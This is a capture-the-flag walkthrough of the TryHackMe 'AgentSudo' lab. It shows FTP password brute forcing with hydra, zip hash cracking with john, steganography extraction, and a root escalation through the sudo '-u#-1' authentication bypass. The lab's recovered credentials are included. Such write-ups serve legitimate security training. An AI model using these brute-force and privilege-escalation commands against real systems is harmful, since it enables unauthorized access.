AgentSudo Write-Up: TryHackMe Machine Walk-through

Machine Description : AgentSudo is a very interesting Linux based machine which will walk us through the a number of cryptographic tools and techniques. I have been assigned a dynamic IP address and you might get a different one. I have provided a High Level Summary of the machine and request you to try it on your own before reading the walk-through.

High Level Summary

User Level Shell

Vulnerability Exploited: It was observed that the application was leaking sensitive information via different means which was leading attacker to gain user level shell.

Privilege Level Shell

Vulnerability Exploited: It was observed that the system was vulnerable to sudo security authentication bypass.

Exploit POC: https://www.exploit-db.com/exploits/47502

Proof of Concept

Initial Reconnaissance

The above exhibit show the NMAP scan of the machine “AgentSudo”

Service Enumeration

A web application was hosted on Port 80 and on enumeration we were able to encounter this static page.

Things to be noted here “codename as user-agent” and From, Agent R.

On manipulating the value of “user-agent” and substituting it with “C”, we were redirected to another page which leaks us some more information.

On following the redirection we are redirected to this page.

The page gives us the hint that there is a user named “chris” and it has very easy and weak password!

Now we try to brute force the FTP service for the user chris using Hyrda.

hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://<IP>

username: chris ; password: crystal

We successfully logged into FTP using the above credentials.

A few interesting files were observed on FTP server and we downloaded using get command.

get <file-name>

Contents of To_agentJ.txt

Dear agent J,
All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
From,
Agent C.

This letter was written by Agent C to Agent J regarding the details of the password used for logging in. It indicated that the alien pictures are fake and the password is stored in alien photograph.

Now we use some tools to see information inside the pictures.

Information extracted using tool binwalk.

We can see in image cutie.png there was an ZIP file archived which has some data in encrypted form. After extraction we can see that file.

Contents of the extract

The file 8702.zip is encrypted with a password and we will try to crack the password using john.

zip2john 8702.zip > output.txt

Now we try to crack the hash.

john output.txt

Now we have password to open the 8702.zip file

7z e 8702.zip

Contents of the file are stored in To_agentsR.txt

Content of file To_agentR.txt

The provided text is base64 encoded. On decoding we got the below password.

We use “steghide” tool to retrieve hidden information of “cute-alien.jpg”.

Initial Foothold

Reading the message.txt

username : james ; password : hackerrules!

Login into SSH with the provided username and password.

Privilege Level Shell

Exploitation

The command sudo -l helps us in listing user’s privileges and checking specific commands which has been provided super user access.

On entering the command we realised that the sudo configuration is misconfigured and the system is vulnerable to sudo security authentication bypass.

Exploit POC: https://www.exploit-db.com/exploits/47502

EXPLOIT: 

sudo -u#-1 /bin/bash

We directly got root access after entering the command into the terminal.

Thank you and wish you Happy Hacking!